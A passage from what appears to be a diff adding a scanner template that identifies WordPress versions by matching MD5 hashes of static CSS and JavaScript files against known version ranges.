"(\"af1bc6adf17f10ad34c9a0bd4c354df9\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"0433cc6b4967a15d2f6be5a92958b812\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4fbee54e4f5824b05f1269c562d1f860\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"85e7a165ac57ff9ef61a1886f3d50593\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"1e357122810800c44d1cbff5fda7747b\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"f1651f06c741f9e429b84160be377ad9\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"95b81581a1a6a3dda3eb13deedb1545e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b0716f9ea0eb89a8037d01d61819d295\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"50da1f79474549fd0de7c53e98d20a80\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"97785d9b8c2eeb9a40dd241db6519b92\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"beb63bfdeb079748fc7e56ee7a01a824\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"2730e933c7a1a342a216a88b59090922\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"638da3bea5a7c1f2b42c3f277cea9846\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"0e5a2cd27f0c4117a5fdf616427a7b76\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a083c62aeb2d3093855dcc92edb5a44c\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"1456ea18b6e704b2de23e24e9f01b905\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"c25af084f22564159483a93fa3b1bd76\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"d2dbe8659e647d0a7081d7d73f18cbf7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"563cb2edac2f1e28bc7ba07afcdda851\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bd502c39f6ac66dd8fc14fc6c47d47c6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"687e07c713318834113a53841a9b8b4f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"f0a8b87f786d638f35e74140aa3cff40\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"5f54285e40c9b21d507d2260a2420f47\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"478fe30c12de9ce895d96b3d0d3bbef9\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"57dafb76bdabe1eab5512ab4832c8f40\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"861b3448d69e1432e1e87fa5e6b54fc9\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"fefacd93bdb86714698d998fc0f2a865\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d6d87061e4402b1fd0c4e821877a40e7\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"60938e53731e909ec1a70c20dd2a96ba\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"582bbded66ab92465aa8decc20a51cba\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"da76e3b93f894e5142d14d00d355e6ab\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"395af750c19e5a0bb9f7e5ed5a0f027d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3f10279b62e53594c3aac3fb3d73c3c8\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3c3de85d77d3959f79cb7d4cc6899268\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji-loader.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"c324a0faeae39356972d91b004b706d4\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"95ba8d3404ccae2dcb692b5153972260\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f3ec21904cc0cf5d899f29e35b0b4612\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"cf0f5dd3b133be89352f938de9d5298f\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"e20f82f707fdc28257628f9bc67c0430\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"4499553cf177cb964b0df8c445ebc798\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"d528caab721209ac3e971fd97384379d\" == md5(body))" + - type: dsl + name: 4.4.2 + dsl: + - "(\"2a684c8e10b5294903e28dcd9cac377b\" == md5(body))" + - type: dsl + name: 4.4.1 + dsl: + - "(\"8569719eaedca791a2136e7bad07de29\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"05fa167592d86e9c03dc30b4f868c00d\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.3.25 + dsl: + - "(\"26ce699f92d7bd2d7dee5ff0827b296c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"5df203c872d3bfe2045aa8dc4370b9fd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"dffc41c697f23eba1915fc204dee2aa9\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"a0ee12a57e464358e104e53446261174\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.1.8 + dsl: + - "(\"0ac3cd92fe3f0052da47e55c729df482\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"3f3c006ec5abc419c38a50107e3854cd\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"7000dea726f734ed07227e6f1abebb13\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e83c87ec3e7c36b6f412d653e4207855\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"0f34fce4c0d019378b3976a898efb1e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets-rtl.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"9858424b442617bafdea74c56346b848\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"11eb0df301b82d5775206d07575f08f9\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"52222282329f1e2ba87d9df556b9da51\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ec5b007681f7fd7595c7209efbddf6d9\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"00f91c295803e867d7fb9e0da9f352a5\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.3.25 + dsl: + - "(\"49b9300d93ddad2c4c8c5136062c5200\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"d81963de7dff71f3295c5a42fba00ab7\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"497445fdaced3a3f74ad9a252e2b95b6\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"bc797ee5fe57916b0191489d31592f2a\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c94cb7b706d93a2575ce4bb127ce4967\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b518ff869f6ee3a90b8a87bdee462390\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3ffd8e2288fc6b29d2e2bec4f1770f4f\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"c72b211f292a7ac48348b3aa47e8f9c1\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"f0799da338bb863983d5f9e0ca53f7ef\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"70b40c8490427ad3fc0d881e0c9995a9\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"a1a32a9b498dfa02859b1d03600b6668\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"5fd9135577a36d561dea45d8845fd9dd\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"cd137a3d74d868ba4bd25fe64b33892d\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"f464200516b71362dfd560b393ada0a0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"3657c79999ecaf34843cb01503d6e727\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.16 + dsl: + - "(\"7d4210bb7278ef9bae8b79a3c726a2bc\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"461cdf628f771b69a60dd1ba4ba4c3dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f08940c0db2d4007baf254e8be1f1b51\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"a8a5b2c135c5a742e935eeb74f548ed1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f25c3ac1e8dc5a2134ba7fec573451be\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"01c2b3122f71d10f82d763808fd477f2\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"70f3f7e0b829eef6cf200786ae55ce6f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"b5aac84283aa7183c30a25527edd3152\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"8a6f5d94ad68066f64975eb24914dea7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"41c0a53f9562353c00b517bf9f76bbad\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"985f4c5f6567fa568c0dd17084f34e31\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"96f0b4f48fed4e062afe2b7fc7d0d890\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"42c906bd2400b2ab11aa44a8f8396a9e\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"acea8fff302212325749ca45805add61\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f4c61ba2aa0c5cd92473ec2b965df108\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"ffc68bc4eeaa6006b6bcb476cc751c43\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"ef980e36248c52fdf84395bb16fed6c1\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"b5a5602923179daa9c75b75e47fd1174\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"8142a20be96cb3dc322e2cd45ec76c0b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"243359672a1fa89898c942b8d3ae40b2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"cc99856d0a90f9996ab7683e9d7a1631\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"e4b5f221205f4075192a67ba25b1dd47\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"eb5a90b48f19ecb9a88c0a9254b7af32\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c4bc56d94f759616b98ec1b3addac4f5\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"cbc0530c7320ad1a70162fef6a74a9aa\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"8409978ebacfbbdd67f280777e42e253\" == md5(body))" + - type: dsl + name: 2.7 - 2.8.6 + dsl: + - "(\"0380e33272aa60d16b2e7d405e7288a8\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"a72d6e3d327047add3066c9e96ce5d1f\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"ad6dfaa24e36fa416d119ee6bf38cf69\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"234fed47c9eef92ca35985d459a99dbf\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"32d34c1ae9e1b6303fb0b846991d308b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1a4a323cf79d38c6061b15766f1a4c01\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"71fc826c2ef26e9dfd4c0ff7ce0d7e89\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"b1703f90b91e7eb19048ce11e28d5b68\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"4fbbf669661beb6bb4cf847428843b43\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"b3f922c2f2b9b81de2e5ea5713de5a68\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.4.4 + dsl: + - "(\"013f2df17e4c93e1b8ad6b3fe66d2a91\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1e0c637714808ce5696fdf07ac84405e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"fede2d004deec3d7c15459a56bd40a21\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"4a2d07ee67ffb1c5b76b2ac486216057\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"eaa208851b66085620779cbf3d30fefb\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3b46a42ebcdf945ff176ce64d7f56668\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"062b51bf3dd5b46eac81fec6b9929559\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"75b114a2b3864eea8534a8b2ff5b66c9\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"aa3dc74f38e3be71febb90a89d2166a8\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"94bb3edac4f1fa30c3f25a79251b53d4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9f95f44ac2be559e61e0c16795bbc10e\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"5b122550eec0c22e85083aab44c80b18\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"97ed56381413cfaf6d52dd5cb79b3e94\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"f8fc964418d9705e139c934fa0af865e\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"fd13d574bf148d9410d3a3d5554e8d1c\" == md5(body))" + - type: dsl + name: 3.9.3 - 3.9.33 + dsl: + - "(\"b516391ad678c1905d10cddd1e8f6f79\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.2 + dsl: + - "(\"0183b86a9564cd298914ccf108e77342\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"9404e45d965fd7625704430c3cee6e51\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"c048cf6c4dbaaf122fbcad50bbb91eda\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"55079e203fbb8913c2f34bd839f9a6dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"98484c4d2af4382680965d96053a78d4\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"7c46e095db079326a9bf66aa5a05f8a4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/quicktags.js" + matchers: + - type: dsl + name: 1.5.1.1 - 1.5.2 + dsl: + - "(\"113197978798c0416584b2f8520b07a7\" == md5(body))" + - type: dsl + name: 1.5.1 + dsl: + - "(\"3081c635f5f5aa2394d8329cbf0a9346\" == md5(body))" + - type: dsl + name: 1.5-strayhorn + dsl: + - "(\"e9cfc5831a5db27731be236ede39c9b5\" == md5(body))" + - type: dsl + name: 1.2-mingus - 1.2.2 + dsl: + - "(\"0a12c9570a5df5e6878dbdb0fa8c9f71\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"b60c22b11fb52febf809b1aea7fc463b\" == md5(body))" + - type: dsl + name: 1.2-delta + dsl: + - "(\"dd3f50ec1b6f1c60d0c8cf487584ac80\" == md5(body))" + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"cacc30e78056fcd0b2a55c3d4add02f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/global.css" + matchers: + - type: dsl + name: 3.2.1 + dsl: + - "(\"6cd0d6c4c32fc3f379668f3754180ff5\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"d056ab8b13e3c4221ed4db6fae71dd9b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"57e3e4cbc2a8f5c8879e04e2fb10c165\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"f70eb26c5ca7f7c0627de3a5b88d999b\" == md5(body))" + - type: dsl + name: 2.9.1 - 2.9.2 + dsl: + - "(\"c65e7d9d4efb1cb319378608ac0af681\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"bc834ff6c4039a8ffa7d623e63406d0c\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"5ec06085a2ae7d41dcfcc9f48701caaf\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"ccafab6b8bc45a0add424be63085ccbc\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"81edc89f673eda2069e9e5f66c54f4af\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6e0f4cca3aca085d28cbc6cb13777a18\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"8d490e27b9916d9d2520e72075333109\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"a2e2f67626ed6f9beca5306c1a16abba\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"1ac33574bd35da1e4cf9e66d2d173686\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"0b9fe6899f34daa1a46f71466cc73f8b\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"19084332c355439f6d42ebc0f0e78ebd\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"6e7ba89ab7be7faca4bd6e96498af536\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"225d1ef58b5ab0f793d3952967df269a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2984023919bf18888432e7459d70bf00\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"fceeca9707faf124a462d8e11a9bfb50\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"dec7253451471693a4bbc6f7caea5879\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"3dd46c8d228ad29a841338280647936d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"50626cb79cfc0acdba560abc2e50006c\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"b129c7f3e3924ed5333b63876f42ff4b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ddc1a40f07fa0698af312e2793e4cb41\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"1afa2caa89a284f06309af1aef0820c0\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"f47d48daa5f6d3bf2b6c2f88f9775311\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"7b21a55b15494b9d4d9e80f7904e11e0\" == md5(body))" + - type: dsl + name: 4.9 - 5.1.8 + dsl: + - "(\"2bcbab07977867b916887573559917fe\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"8065e85570ca93fb489a57745021a048\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d5c9675e20338decbb5cbb5704cbeae3\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"458ea8a81563ce8eaa88303f659fe146\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"4738b8261ae8b11da71d10be56c25807\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"cdbd8bfddef26eea88e98fbef6b19611\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fac6e061f27691964e34ba5f02dfff2a\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8136bbc002d33f1d8231bda314363d57\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"1368498ecb829d4e2c9d74efd0dc522e\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"7fa4ce4504456ad54bc13673d3266608\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f2633c807b88f1a99e21d313a4986f0f\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"bf8fa9a1830d020a8191eb02c7f74b54\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"9ce0cd57c664c6b6c72c85b64ea72ea1\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"f1c91e971f2317ad15a0a50154cf1356\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"e79814b0b564f9a8b5e06b98ce80b5e9\" == md5(body))" + - type: dsl + name: 3.9.3 - 3.9.33 + dsl: + - "(\"d4d06728cf002756d5f307b0666c7b11\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.2 + dsl: + - "(\"8f22e62d72c7f4553d29514d41fb824d\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"ed47e3d063b256c3edef89d85d0b516b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"510900bd2c55baa38079d9fac576c515\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"275361937714babb1b4ed539582be877\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"39d6da8be0e91e0150c0684f8b9b7274\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d66af83ce6975dd8408299bfc00934f9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/blocks.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"39f14d3f235f1b438feb1983f1246c4d\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"07722730c567be75e4438cdeeb9afebf\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"f39f38665ac6b784630b3f652375580b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7a4696d08badf70c1e40f882ffe45813\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"19801973086df807bf07272d475370df\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"c886c5a99073a097c77ac0b89dd6ec66\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f022f4f2a3248b7ce50e01ccd46f660b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5f1739cdb7dda32447c2c81d677e578f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"0c070288e2b9c65d47a73b68dbc70053\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"b57ba5af1f0dcb22a28a10a15a1c187a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b944c021151abe56dcf15aae4252d4b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/blocks.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"55b0f687a9ea42d06bba894f8d3d58a9\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"a3d6108766198fa534db62d0c9cd02dc\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"e66a65abca2667e9478f1298b964be52\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"bbabeb0779cefc55436edfc4ca85a864\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"627c0dca5a0143b6bd29769757aea9e8\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"f8e70eee74b9fada4d55fe508400eff3\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8d249279b45fc87136d2af98321c9db8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"60dc7602dbe6addad4f278cea89c736a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"a5cfda46f199bc177ec3f6198ca9a160\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"86e6dad06c0a7f869867b207ee1d4838\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"02ce8805820f96d384787c925abe8185\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/dom.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"65e376108b5d8442e0739aa242e75498\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"13ac23f572d351e0523c16bd91350a37\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"0da7a6c0a8988d47b4cbc451ed68e712\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"342d2e765fb6ff70b894d5fcfc7861ce\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"6bc385e8405cb07727a4ebd091b4916b\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"dbb3dfa3c1256ef2d6222ccb3cd482e2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"82bd38f305c829b91eaed795af25189f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3e341c7a7997aa67b5c81211a6b213b5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5fafcc5a10047a3a96f4ec4758767a4b\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"ad44af54b9265c03f60225a806b38a79\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"bdf1d97209882d42e48a2731e681501f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/dom.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"91d9eb0578838f14194588b1468319a7\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"f8fee8733a4739ee773369d652227b08\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"a2f3f8a8d0643c3fef95f4c59b78472a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1d8a89e41858235c36fdf20e6033ada6\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"d6c4e015c1889eadbcdf2745b92ba58e\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"5f77096af37563d6de3107873f744022\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"05964cc1e69f018147aeda2b60d4c2ec\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4d1c93f2308b999efb9a6a3a3f6bac2b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f4e037f28dd5e88eecd449ee99700948\" == 